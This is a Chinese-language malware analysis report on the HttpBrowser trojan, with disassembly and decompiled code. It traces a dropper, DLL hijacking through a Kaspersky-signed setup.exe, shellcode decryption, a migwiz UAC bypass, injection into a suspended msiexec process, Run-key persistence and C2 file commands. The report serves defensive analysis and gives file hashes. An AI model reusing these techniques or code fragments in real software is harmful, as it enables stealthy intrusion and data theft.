利用kaspersky白文件的恶意样本分析
之前分析过的样本,随便贴点东西上来吧…
by @b2ahex
一、样本信息
样本名称:280836636_37EEC1A29D316ED1E5E766B599DC32A1.bin
样本大小: 64,599 字节
文件类型:EXE文件
病毒名称:HttpBrowser
样本MD5: 37eec1a29d316ed1e5e766b599dc32a1
样本SHA256:a89c21dd608c51c4bf0323d640f816e464578510389f9edcf04cd34090decc91
二、行为分析
280836636_37EEC1A29D316ED1E5E766B599DC32A1.bin 样本的主要行为分为三部分:释放3个文件,启动其中释放的 EXE,提高自身优先级并在退出后通过外部命令自删除,详细如下:
1.获取TEMP路径,并将其设置为当前目录
push 0x0
push eax
mov byte ptr ss:[ebp-0x114],0x0
call <jmp.&msvcrt.memset>
add esp,0x48
lea eax,[local.69]
push eax ; /Buffer = 0017FD64
push 0x104 ; |BufSize = 104 (260.)
call dword ptr ds:[<&KERNEL32.GetTempPathA>]
lea eax,[local.69]
push eax ; /Path = "C:\Users\admin\AppData\Local\Temp\"
call dword ptr ds:[<&KERNEL32.SetCurrentDirect>
2.连续3次使用zlib解码内存中的数据,释放到temp目录,并修改释放文件的时间属性
在 temp 目录释放解码之后的文件,并修改文件时间
00F44310 |. 50 push eax
00F44311 |. FFB5 D4FEFFFF push [local.75]; |Attributes = ARCHIVE|NORMAL
00F44317 |. 6A 02 push 0x2 ; |Mode = CREATE_ALWAYS
00F44319 |. 50 push eax ; |pSecurity = NULL
00F4431A |. 50 push eax ; |ShareMode = 0
00F4431B |. 68 00000040 push 0x40000000; |Access = GENERIC_WRITE
00F44320 |. 53 push ebx ; |msi.dll
00F44321 |. FF15 2C50F400 call dword ptr ds:[<&KERNEL32.CreateFileA>]
00F44327 |. 8BF0 mov esi,eax
00F44329 |. 83FE FF cmp esi,-0x1
00F4432C |. 75 0A jnz short 28083663.00F44338
00F4432E |. B8 00020000 mov eax,0x200
00F44333 |. E9 90000000 jmp 28083663.00F443C8
00F44338 |> 8B1F mov ebx,dword ptr ds:[edi]
00F4433A |. E8 F8F6FFFF call 28083663.00F43A37
00F4433F |. C645 0B 00 mov byte ptr ss:[ebp+0xB],0x0
00F44343 |. BB 00400000 mov ebx,0x4000
00F44348 |. EB 1B jmp short 28083663.00F44365
00F4434A |> 74 32 / je short 28083663.00F4437E
00F4434C |. 6A 00 | push 0x0 ; /pOverlapped = NULL
00F4434E |. 8D4D FC | lea ecx,[local.1] ; |
00F44351 |. 51| push ecx ; |pBytesWritten = NULL
00F44352 |. 50| push eax ; |nBytesToWrite = 0x0
00F44353 |. 8D85 CCBDFFFF | lea eax,[local.4237] ; |
00F44359 |. 50| push eax ; |Buffer = NULL
00F4435A |. 56| push esi ; |hFile = 005512B8
00F4435B |. FF15 3850F400 | call dword ptr ds:[<&KERNEL32.WriteFile>]
修改文件时间 -> 2014年4月X日
009E4390 |. 8D85 E8FEFFFF lea eax,[local.70]
009E4396 |. 50 push eax ; /pLastWrite = 0031F104
009E4397 |. 8D85 D8FEFFFF lea eax,[local.74] ; |
009E439D |. 50 push eax ; |pLastAccess = 0031F104
009E439E |. 8D85 E0FEFFFF lea eax,[local.72] ; |
009E43A4 |. 50 push eax ; |pCreationTime = 0031F104
009E43A5 |. 56 push esi ; |hFile = 0000000C
009E43A6 |. FF15 34509E00 call dword ptr ds:[<&KERNEL32.SetFileTime>] ; \SetFileTime
009E43AC |> 56 push esi ; /hObject = 0000000C
009E43AD |. FF15 4C509E00 call dword ptr ds:[<&KERNEL32.CloseHandle>] ; \CloseHandle
样本一共释放了3个文件,其中 Setup.exe 是 Kaspersky 的正常文件,这里被用于 DLL 劫持(白加黑)
文件信息如下:
Filepath: %TEMP%\msi.dll
Size: 4.5KiB (4608 bytes)
Type: PE32 (DLL)
MD5:cab40c98344ab44d2701b7b9c2efcbfa
SHA1:69d899d6e737551f6dadc79286b3fec9d731e0fb
SHA256:0101ad43ba1a3b7daf650942c31a92347a54d07eac2a8c6b2f7ae0af42046540
=======================================================================
Filepath:%TEMP%\msi.dll.url
Size:18KiB (18510 bytes)
Type:datafile(Shellcode + Dll)
MD5:3b1f4b2856bd8055c2a0d9a8e895d44e
SHA1:0e57e7cd58a817e140068da60721a57e9ffebf17
SHA256:5d0fa65d7f86f310b71561ec6a62961226077daefe73f108dc305e3764e40231
========================================================================
Filepath:%TEMP%\setup.exe
Size:34KiB (34424 bytes)
Type:PE32 EXE
MD5:d00b3169f45e74bb22a1cd684341b14a
SHA1:2d8e43f9f8ef6cdf0cafb170a65cb27d37fb166d
SHA256:83f40e70ea3ba0e614d08f1070dafe75092660003b8a1f8b563d4f5b012f(注:此值仅 60 个十六进制字符,不是完整的 SHA256,疑为截断;作为 IoC 使用时以上面的 MD5/SHA1 为准)
3.启动刚释放的Setup.exe
009E122E |. 57 push edi
009E122F |. 8D85 E9FDFFFF lea eax,dword ptr ss:[ebp-0x217] ; |
009E1235 |. 53 push ebx ; |c = 00
009E1236 |. 50 push eax ; |s = 0031F680
009E1237 |. 889D E8FDFFFF mov byte ptr ss:[ebp-0x218],bl ; |
009E123D |. E8 BA340000 call <jmp.&msvcrt.memset ; \memset
009E1242 |. 83C4 10 add esp,0x10
009E1245 |. 8D85 ECFEFFFF lea eax,[local.69]
009E124B |. 50 push eax ; / "C:\Users\admin\AppData\Local\Temp\\setup.exe"
009E124C |. 8D85 E8FDFFFF lea eax,[local.134]
009E1252 |. 50 push eax
009E1253 |. FF15 24509E00 call dword ptr ds:[<&KERNEL32.lstrcpyA>] ; \lstrcpyA
009E1259 |. 68 14519E00 push 28083663.009E5114 ; /StringToAdd = "\setup.exe"
009E125E |. 8D85 E8FDFFFF lea eax,[local.134]; |
009E1264 |. 50 push eax ; |ConcatString = "C:\Users\admin\AppData\Local\Temp\\setup.exe"
009E1265 |. FF15 10509E00 call dword ptr ds:[<&KERNEL32.lstrcatA>] ; \lstrcatA
009E126B |. 8B35 58509E00 mov esi,dword ptr ds:[<&SHELL32.ShellExecuteA>>; shell32.ShellExecuteA
009E1271 |. 6A 05 push 0x5 ; /IsShown = 0x5
009E1273 |. 8D85 ECFEFFFF lea eax,[local.69] ; |
009E1279 |. 50 push eax ; |DefDir = "C:\Users\admin\AppData\Local\Temp\\setup.exe"
009E127A |. 53 push ebx ; |Parameters = NULL
009E127B |. 8D85 E8FDFFFF lea eax,[local.134]; |
009E1281 |. 50 push eax ; |FileName = "C:\Users\admin\AppData\Local\Temp\\setup.exe"
009E1282 |. BF 20519E00 mov edi,28083663.009E5120
009E1287 |. 57 push edi ; |Operation = "open"
009E1288 |. 53 push ebx ; |hWnd = NULL
009E1289 |. FFD6 call esi ; \ShellExecuteA
4.提高自身优先级,自身进程退出后,通过外部命令实现程序自删除
009E12AD |. 59 pop ecx
009E12AE |. 59 pop ecx
009E12AF |. 68 00010000 push 0x100 ; /Priority = REALTIME_PRIORITY_CLASS
009E12B4 |. 8818 mov byte ptr ds:[eax],bl ; |
009E12B6 |. FF15 04509E00 call dword ptr ds:[<&KERNEL32.GetCurrentProces>; |[GetCurrentProcess
009E12BC |. 50 push eax ; |hProcess = 0031F23C
009E12BD |. FF15 00509E00 call dword ptr ds:[<&KERNEL32.SetPriorityClass>; \SetPriorityClass
009E12C3 |. 6A 0F push 0xF ; /Priority = THREAD_PRIORITY_TIME_CRITICAL
009E12C5 |. FF15 08509E00 call dword ptr ds:[<&KERNEL32.GetCurrentThread>; |[GetCurrentThread
009E12CB |. 50 push eax ; |hThread = 0031F23C
009E12CC |. FF15 14509E00 call dword ptr ds:[<&KERNEL32.SetThreadPriorit>; \SetThreadPriority
009E12D2 |. FF15 0C509E00 call dword ptr ds:[<&KERNEL32.GetCommandLineA>>; [GetCommandLineA
009E12D8 |. 50 push eax ; /<%s> = "/c del /q "C:\Users\admin\Desktop\280836636_37EEC1A29D316ED1E5E766B599DC32A1.bin""
009E12D9 |. 8D85 A4F9FFFF lea eax,[local.407] ; |
009E12DF |. 68 28519E00 push 28083663.009E5128 ; |Format = "/c del /q %s"
009E12E4 |. 50 push eax ; |s = 0031F23C
009E12E5 |. FF15 60509E00 call dword ptr ds:[<&USER32.wsprintfA>] ; \wsprintfA
009E12EB |. 83C4 0C add esp,0xC
009E12EE |. 53 push ebx
009E12EF |. 8D85 B4FAFFFF lea eax,[local.339]
009E12F5 |. 50 push eax
009E12F6 |. 8D85 A4F9FFFF lea eax,[local.407]
009E12FC |. 50 push eax
009E12FD |. 68 38519E00 push 28083663.009E5138 ; ASCII 63,"cmd.exe"
009E1302 |. 57 push edi ; 28083663.009E5120
009E1303 |. 53 push ebx
009E1304 |. FFD6 call esi ; shell32.ShellExecuteA
Setup.exe 是 Kaspersky 的正常 EXE,其主要行为是加载刚刚释放的 msi.dll,这里被用于加载恶意 dll
(ps:这个EXE带有Kaspersky Lab的数字签名证书)
加载释放的dll文件(LoadLibraryA 只传入了不带路径的 "msi.dll",按默认 DLL 搜索顺序会先在 setup.exe 所在目录查找,因此同目录下释放的恶意 msi.dll 被加载,即 DLL 搜索顺序劫持)
0040146F |. 68 8C414000 push setup.0040418C ; /FileName = "msi.dll"
00401474 |. FF15 2C404000 call dword ptr ds:[<&KERNEL32.LoadLibraryA>] ; \LoadLibraryA
msi.dll 样本的主要功能为将 msi.dll.url 文件读入内存,并执行其中的 shellcode
读取msi.dll.url文件到内存
1000034C 68 A40A0010 push msi.10000AA4 ; ASCII ".url"
10000351 8D95 E8FEFFFF lea edx,dword ptr ss:[ebp-0x118]
10000357 52 push edx
10000358 FF15 100A0010 call dword ptr ds:[<&KERNEL32.lstrcatA>] ; kernel32.lstrcatA
1000035E 6A 00 push 0x0
10000360 6A 00 push 0x0
10000362 6A 03 push 0x3
10000364 6A 00 push 0x0
10000366 6A 01 push 0x1
10000368 68 00000080 push 0x80000000
1000036D 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-0x118]
10000373 50 push eax
10000374 FF15 000A0010 call dword ptr ds:[<&KERNEL32.CreateFileA>] ; kernel32.CreateFileA
1000037A 8985 E0FEFFFF mov dword ptr ss:[ebp-0x120],eax
10000380 83BD E0FEFFFF FF cmp dword ptr ss:[ebp-0x120],-0x1
10000387 0F84 86000000 je msi.10000413
1000038D 6A 00 push 0x0
1000038F 8B8D E0FEFFFF mov ecx,dword ptr ss:[ebp-0x120]
10000395 51 push ecx
10000396 FF15 040A0010 call dword ptr ds:[<&KERNEL32.GetFileSize>] ; kernel32.GetFileSize
1000039C 8945 F8 mov dword ptr ss:[ebp-0x8],eax
1000039F 837D F8 00 cmp dword ptr ss:[ebp-0x8],0x0
100003A3 76 61 jbe short msi.10000406
100003A5 6A 40 push 0x40
100003A7 68 00100000 push 0x1000
100003AC 8B55 F8 mov edx,dword ptr ss:[ebp-0x8]
100003AF 83C2 01 add edx,0x1
100003B2 52 push edx
100003B3 6A 00 push 0x0
100003B5 FF15 140A0010 call dword ptr ds:[<&KERNEL32.VirtualAlloc>] ; kernel32.VirtualAlloc
100003BB 8945 FC mov dword ptr ss:[ebp-0x4],eax
100003BE 837D FC 00 cmp dword ptr ss:[ebp-0x4],0x0
100003C2 74 42 je short msi.10000406
100003C4 6A 00 push 0x0
100003C6 6A 00 push 0x0
100003C8 6A 00 push 0x0
100003CA 8B85 E0FEFFFF mov eax,dword ptr ss:[ebp-0x120]
100003D0 50 push eax
100003D1 FF15 080A0010 call dword ptr ds:[<&KERNEL32.SetFilePointer>]; kernel32.SetFilePointer
100003D7 6A 00 push 0x0
100003D9 8D8D E4FEFFFF lea ecx,dword ptr ss:[ebp-0x11C]
100003DF 51 push ecx
100003E0 8B55 F8 mov edx,dword ptr ss:[ebp-0x8]
100003E3 52 push edx
100003E4 8B45 FC mov eax,dword ptr ss:[ebp-0x4]
100003E7 50 push eax
100003E8 8B8D E0FEFFFF mov ecx,dword ptr ss:[ebp-0x120]
100003EE 51 push ecx
100003EF FF15 0C0A0010 call dword ptr ds:[<&KERNEL32.ReadFile>] ; kernel32.ReadFile
msi.dll.url 文件的主要功能为执行shellcode:从自身数据段解码出一个dll可执行文件,修复其导入表,然后在内存中执行,该解码出来的dll为木马的主体。shellcode分析如下:
1.跳转到msi.dll.url,执行Shellcode,进行代码SMC(自修改代码)动态自解密,获得下面的shellcode
00340015 317B 16 xor dword ptr ds:[ebx+0x16],edi
00340018 037B 16 add edi,dword ptr ds:[ebx+0x16]
0034001B ^ E2 F5 loopd short 00340012
0034001D E8 FB090000 call 00340A1D
00340022 C3 retn
00340023 CC int3
00340024 CC int3
00340025 CC int3
00340026 CC int3
00340027 CC int3
00340028 CC int3
00340029 CC int3
0034002A CC int3
0034002B CC int3
0034002C CC int3
0034002D 55 push ebp
2.通过计算函数名哈希并与预期值比较,在ntdll中定位指定api
003400C8 55 push ebp
003400C9 8BEC mov ebp,esp
003400CB 51 push ecx ; ntdll.76FA5618
003400CC 53 push ebx ; ntdll.76FAA312
003400CD 52 push edx ; ntdll.76FA9310
003400CE 33C9 xor ecx,ecx ; ntdll.76FA5618
003400D0 33DB xor ebx,ebx ; ntdll.76FAA312
003400D2 33D2 xor edx,edx ; ntdll.76FA9310
003400D4 8B45 08 mov eax,dword ptr ss:[ebp+0x8]
003400D7 8A10 mov dl,byte ptr ds:[eax]
003400D9 80CA 60 or dl,0x60
003400DC 03DA add ebx,edx ; ntdll.76FA9310
003400DE D1E3 shl ebx,1
003400E0 0345 10 add eax,dword ptr ss:[ebp+0x10]
003400E3 8A08 mov cl,byte ptr ds:[eax]
003400E5 84C9 test cl,cl
003400E7 ^ E0 EE loopdne short 003400D7
003400E9 33C0 xor eax,eax
003400EB 8B4D 0C mov ecx,dword ptr ss:[ebp+0xC]
003400EE 3BD9 cmp ebx,ecx ; ntdll.76FA5618
003400F0 74 01 je short 003400F3
003400F2 40 inc eax
003400F3 5A pop edx
获取以下API地址:
memcpy
memset
RtlAllocateHeap
RtlReAllocateHeap
LoadLibraryA
GetProcAddress
VirtualAlloc
VirtualProtect
VirtualFree
IsBadReadPtr
GetProcessHeap
RtlDecompressBuffer
003408DD 55 push ebp
003408DE 8BEC mov ebp,esp
003408E0 68 7A340000 push 0x347A
003408E5 68 08B70100 push 0x1B708
003408EA E8 3EF7FFFF call <Getfuncaddr> ; memcpy
003408EF 83C4 08 add esp,0x8
003408F2 8B4D 08 mov ecx,dword ptr ss:[ebp+0x8]
003408F5 8941 0C mov dword ptr ds:[ecx+0xC],eax
003408F8 68 C4340000 push 0x34C4
003408FD 68 08B70100 push 0x1B708
00340902 E8 26F7FFFF call <Getfuncaddr> ; memset
00340907 83C4 08 add esp,0x8
0034090A 8B55 08 mov edx,dword ptr ss:[ebp+0x8]
0034090D 8942 10 mov dword ptr ds:[edx+0x10],eax
00340910 68 2C477000 push 0x70472C
00340915 68 08B70100 push 0x1B708
0034091A E8 0EF7FFFF call <Getfuncaddr> ; RtlAllocateHeap
.....
3.调用RtlDecompressBuffer解压出一个pe文件(dll),即核心木马
00340867 6A 00 push 0x0
00340869 8B55 08 mov edx,dword ptr ss:[ebp+0x8]
0034086C 8B42 24 mov eax,dword ptr ds:[edx+0x24]
0034086F FFD0 call eax ; VirtualAlloc
00340871 8945 FC mov dword ptr ss:[ebp-0x4],eax
00340874 837D FC 00 cmp dword ptr ss:[ebp-0x4],0x0
00340878 74 38 je short 003408B2
0034087A 8B4D 18 mov ecx,dword ptr ss:[ebp+0x18]
0034087D 51 push ecx
0034087E 8B55 14 mov edx,dword ptr ss:[ebp+0x14]
00340881 52 push edx
00340882 8B45 10 mov eax,dword ptr ss:[ebp+0x10]
00340885 8B08 mov ecx,dword ptr ds:[eax]
00340887 51 push ecx
00340888 8B55 18 mov edx,dword ptr ss:[ebp+0x18]
0034088B 8B02 mov eax,dword ptr ds:[edx]
0034088D 50 push eax
0034088E 8B4D FC mov ecx,dword ptr ss:[ebp-0x4]
00340891 51 push ecx
00340892 0FB755 0C movzx edx,word ptr ss:[ebp+0xC]
00340896 52 push edx
00340897 8B45 08 mov eax,dword ptr ss:[ebp+0x8]
0034089A 8B48 30 mov ecx,dword ptr ds:[eax+0x30]
0034089D FFD1 call ecx ; RtlDecompressBuffer
4.动态加载WININET,ws2_32,kernel32,user32,ADVAPI32.dll,shell32,ole32,msvcr模块,并获取所需API地址,修复内存DLL的导入地址表,最终跳转到核心木马dll
00340536 8B45 F0 mov eax,dword ptr ss:[ebp-0x10]
00340539 8B4D F4 mov ecx,dword ptr ss:[ebp-0xC]
0034053C 0348 0C add ecx,dword ptr ds:[eax+0xC]
0034053F 51 push ecx
00340540 8B55 08 mov edx,dword ptr ss:[ebp+0x8]
00340543 8B02 mov eax,dword ptr ds:[edx]
00340545 FFD0 call eax ; LoadLibraryA
00340547 8945 E4 mov dword ptr ss:[ebp-0x1C],eax
0034054A 837D E4 FF cmp dword ptr ss:[ebp-0x1C],-0x1
0034054E 75 0C jnz short 0034055C
00340550 C745 F8 00000000 mov dword ptr ss:[ebp-0x8],0x0
00340557 E9 20010000 jmp 0034067C
0034055C 8B4D 0C mov ecx,dword ptr ss:[ebp+0xC]
0034055F 8B51 0C mov edx,dword ptr ds:[ecx+0xC]
00340562 8D0495 04000000 lea eax,dword ptr ds:[edx*4+0x4]
00340639 8B55 E8 mov edx,dword ptr ss:[ebp-0x18]
0034063C 8B45 F4 mov eax,dword ptr ss:[ebp-0xC]
0034063F 0302 add eax,dword ptr ds:[edx]
00340641 8945 E0 mov dword ptr ss:[ebp-0x20],eax
00340644 8B4D E0 mov ecx,dword ptr ss:[ebp-0x20]
00340647 83C1 02 add ecx,0x2
0034064A 51 push ecx
0034064B 8B55 E4 mov edx,dword ptr ss:[ebp-0x1C]
0034064E 52 push edx
0034064F 8B45 08 mov eax,dword ptr ss:[ebp+0x8]
00340652 8B48 04 mov ecx,dword ptr ds:[eax+0x4]
00340655 FFD1 call ecx ; GetFuncAddress
00340657 8B55 EC mov edx,dword ptr ss:[ebp-0x14]
0034065A 8902 mov dword ptr ds:[edx],eax
0034065C 8B45 EC mov eax,dword ptr ss:[ebp-0x14]
0034065F 8338 00 cmp dword ptr ds:[eax],0x0
00340662 75 09 jnz short 0034066D
00340664 C745 F8 00000000 mov dword ptr ss:[ebp-0x8],0x0
0034066B EB 02 jmp short 0034066F
0034066D ^ EB 85 jmp short 003405F4
0034066F 837D F8 00 cmp dword ptr ss:[ebp-0x8],0x0
木马核心DLL分析:
1.
核心dll在初次运行时会将temp目录下释放的3个文件移动到C:\ProgramData\kav\目录,并将setup.exe重命名为svchost.exe
GetModuleFileNameW(v0, v16, v17);
if ( lstrcmpW(&Filename, &String1) )
{
GetTempPathW(0x104u, &Buffer);
GetTempFileNameW(&PathName, &PrefixString, 0x10u, &PathName);
SetFileAttributesW(&String1, 0x80u);
MoveFileExW(&String1, &PathName, 1u);
MoveFileExW(&PathName, 0, 4u);
MoveFileExW(&Filename, &String1, 3u);
lstrcpyW(&NewFileName, &String2);
lstrcatW(&NewFileName, &word_364808);
MoveFileW(&ExistingFileName, &NewFileName);
lstrcpyW(&v4, &String2);
lstrcatW(&v4, &word_3646D4);
MoveFileW(&word_36482C, &v4);
}
2.
利用migwiz白名单程序绕过UAC
Parameters = 0;
((void (__cdecl *)(char *, _DWORD, _DWORD))dword_363AD8)(&v13, 0, 518);
wsprintfW(&Parameters, &word_364624, v11, v2);
Buffer = 0;
((void (__cdecl *)(char *, _DWORD, _DWORD))dword_363AD8)(&v15, 0, 518);
GetSystemDirectoryW(&Buffer, 0x103u);
lstrcatW(&Buffer, L"\\migwiz\\migwiz.exe");
if ( sub_3631AF() )
{
v3 = GetModuleHandleW(&ModuleName);
v10 = GetProcAddress(v3, ProcName);
v4 = GetModuleHandleW(&ModuleName);
v5 = GetProcAddress(v4, byte_364664);
v6 = v5;
v11 = 0;
if ( v10 && v5 )
{
if ( ((int (__stdcall *)(int *))v10)(&v11) )
{
ShellExecuteW(0, &Operation, &Buffer, &Parameters, &String2, 5);
((void (__stdcall *)(int))v6)(v11);
}
}
}
else
3.
创建挂起(CREATE_SUSPENDED)的msiexec傀儡进程,远程写入从.url文件中提取的shellcode,并创建远程线程执行;注意上线地址和端口已经通过CreateProcess的命令行参数传递给傀儡进程
0012E9D0 0012EC68 |ModuleFileName = "C:\Windows\system32\msiexec.exe"
0012E9D4 0012EA60 |CommandLine = " 103.xx.x.x4 443 1"
0012E9D8 00000000 |pProcessSecurity = NULL
0012E9DC 00000000 |pThreadSecurity = NULL
0012E9E0 00000001 |InheritHandles = TRUE
0012E9E4 00000004 |CreationFlags = CREATE_SUSPENDED
0012E9E8 00000000 |pEnvironment = NULL
0012E9EC 00000000 |CurrentDir = NULL
0012E9F0 0012EA04 |pStartupInfo = 0012EA04
0012E9F4 0012EA48 \pProcessInfo = 0012EA48
0012E9F8 00364714 ASCII "443"
00362878 FF15 D4403600 call dword ptr ds:[0x3640D4] ; kernel32.VirtualAlloc
0036287E 8985 E0F9FFFF mov dword ptr ss:[ebp-0x620],eax
00362884 3BC6 cmp eax,esi
00362886 74 28 je short 003628B0
00362888 56 push esi
00362889 56 push esi
0036288A 56 push esi
0036288B 53 push ebx
0036288C FF15 64403600 call dword ptr ds:[0x364064] ; kernel32.SetFilePointer
00362892 56 push esi
00362893 8D85 DCF9FFFF lea eax,dword ptr ss:[ebp-0x624]
00362899 50 push eax
0036289A 57 push edi
0036289B FFB5 E0F9FFFF push dword ptr ss:[ebp-0x620]
003628A1 53 push ebx
003628A2 FF15 D0403600 call dword ptr ds:[0x3640D0] ; kernel32.ReadFile
003628A8 39BD DCF9FFFF cmp dword ptr ss:[ebp-0x624],edi
003628AE ^ 75 A7 jnz short 00362857
003628B0 53 push ebx
003628B1 FF15 7C403600 call dword ptr ds:[0x36407C] ; kernel32.CloseHandle
003628B7 8D85 CCF9FFFF lea eax,dword ptr ss:[ebp-0x634]
003628BD 50 push eax
003628BE 8D85 88F9FFFF lea eax,dword ptr ss:[ebp-0x678]
003628C4 50 push eax
003628C5 56 push esi
003628C6 56 push esi
003628C7 6A 04 push 0x4
003628C9 6A 01 push 0x1
003628CB 56 push esi
003628CC 56 push esi
003628CD 8D85 E4F9FFFF lea eax,dword ptr ss:[ebp-0x61C]
003628D3 50 push eax
003628D4 8D85 ECFBFFFF lea eax,dword ptr ss:[ebp-0x414]
003628DA 50 push eax
003628DB FF15 84403600 call dword ptr ds:[0x364084] ; kernel32.CreateProcessW
003628E1 85C0 test eax,eax
003628E3 ^ 0F84 6EFFFFFF je 00362857
003628E9 6A 40 push 0x40
003628EB 68 00300000 push 0x3000
003628F0 8D47 01 lea eax,dword ptr ds:[edi+0x1]
003628F3 50 push eax
003628F4 56 push esi
003628F5 FFB5 CCF9FFFF push dword ptr ss:[ebp-0x634]
003628FB FF15 B0403600 call dword ptr ds:[0x3640B0] ; kernel32.VirtualAllocEx
00362901 8BD8 mov ebx,eax
00362903 3BDE cmp ebx,esi
00362905 ^ 0F84 4CFFFFFF je 00362857
0036290B 56 push esi
0036290C 57 push edi
0036290D FFB5 E0F9FFFF push dword ptr ss:[ebp-0x620]
00362913 53 push ebx
00362914 FFB5 CCF9FFFF push dword ptr ss:[ebp-0x634]
0036291A FF15 C0403600 call dword ptr ds:[0x3640C0] ; kernel32.WriteProcessMemory
00362920 85C0 test eax,eax
00362922 ^ 0F84 2FFFFFFF je 00362857
00362928 56 push esi
00362929 56 push esi
0036292A 56 push esi
0036292B 53 push ebx
0036292C 56 push esi
0036292D 56 push esi
0036292E FFB5 CCF9FFFF push dword ptr ss:[ebp-0x634]
00362934 FF15 94403600 call dword ptr ds:[0x364094] ; kernel32.CreateRemoteThread
4.
msiexec 中的 shellcode 再次在内存中解密并执行木马核心dll,由于此时的命令行参数发生变化(已带有上线的ip和端口),代码流程也随之变化:通过在注册表 HKCU\Software\Microsoft\Windows\CurrentVersion\Run\kav 位置写入 “C:\ProgramData\kav\svchost.exe”,将其设置为自启动程序
if ( pNumArgs == 4 )
{
InitAndSetAuto();
v5 = wtoi(v4[3]);
v6 = wtoi(v4[2]);
NetWork(v4[1], v6, v5);
}
if ( pNumArgs == 1 )
{
MoveAndPassUac();
v7 = atoi(Str);
if ( !CreatePuppet(v7) )
{
v8 = atoi(Str);
NetWork(&szServerName, v8, 1);
}
ExitProcess(0);
}
设置svchost.exe(原setup.exe)自启动
((void (__cdecl *)(char *, _DWORD, signed int))dword_363AD8)(&v5, 0, 518);
wsprintfW(&String, &word_36478C, a1);
result = RegCreateKeyExW(HKEY_CURRENT_USER, &SubKey, 0, 0, 0, 0xF003Fu, 0, &phkResult, 0);
if ( !result )
{
v2 = lstrlenW(&String);
RegSetValueExW(phkResult, &ValueName, 0, 1u, (const BYTE *)&String, 2 * v2);
result = RegCloseKey(phkResult);
}
5.
木马通过http协议与远程服务器进行通信
IP:103.xx.x.x4
Port:443
.text:003618A7 pushebx ; dwFlags
.text:003618A8 pushebx ; lpszProxyBypass
.text:003618A9 pushebx ; lpszProxy
.text:003618AA pushebx ; dwAccessType
.text:003618AB pushoffset szAgent ; "HttpBrowser/1.0"
.text:003618B0 mov [esp+434h+var_410], ebx
.text:003618B4 callds:InternetOpenW
.text:003618BA cmp eax, ebx
.text:003618BC jz loc_361A28
.text:003618C2 pushebx ; dwContext
.text:003618C3 pushebx ; dwFlags
.text:003618C4 push3 ; dwService
.text:003618C6 pushebx ; lpszPassword
.text:003618C7 pushebx ; lpszUserName
.text:003618C8 pushdword ptr [ebp+nServerPort] ; nServerPort
.text:003618CB pushesi ; lpszServerName
.text:003618CC pusheax ; hInternet
.text:003618CD callds:InternetConnectW
经分析,木马支持 init、write、list、upload、down 等命令,包含文件列表、上传、下载等主要功能
while ( 1 )
{
if ( SendGetPack(v5, a3, &MultiByteStr) )
{
v6 = sub_363570(&MultiByteStr);
if ( sub_36318C(L"init", v6) )
{
v7 = 0;
a3 = 1;
sub_362BC4();
sub_3629E3(v5);
sub_361000(v5);
}
else if ( sub_36318C(L"write", v6) )
{
v7 = 0;
a3 = 1;
sub_362C65(v6 + 6);
}
else if ( sub_36318C(L"list", v6) )
{
v7 = 0;
a3 = 1;
GetFileList(v5, 0);
}
else if ( sub_36318C(L"upload", v6) )
{
v7 = 0;
a3 = 1;
uploadfunc(v6 + 7);
GetFileList(v8, 1);
v5 = v8;
}
else if ( sub_36318C(L"down", v6) )
{
v7 = 0;
a3 = 1;
downfunc((int)v5, v6 + 5);
}
else if ( v7 >= 10 || (++v7, v7 >= 10) )
{
a3 = 10;
}
operator delete(v6);
}
Sleep(1000 * a3);
}
三、样本分析总结
样本的工作流程如下:
- 280836636原始样本 在临时目录释放 3个文件,并启动其中带有 Kaspersky Lab 数字签名的 setup.exe,之后自删除
- setup.exe 被执行后加载同目录下释放的 msi.dll(DLL 劫持,白加黑)
- msi.dll 解析并加载释放的 msi.dll.url 文件,这个文件包含一段 shellcode及木马的核心dll
- msi.dll.url 解密自身代码,在内存中释放并执行木马的核心dll
- 木马核心dll 根据自身参数移动temp目录下的三个文件到指定目录,并包含UAC绕过、创建傀儡进程、设置自启动及上线通信等功能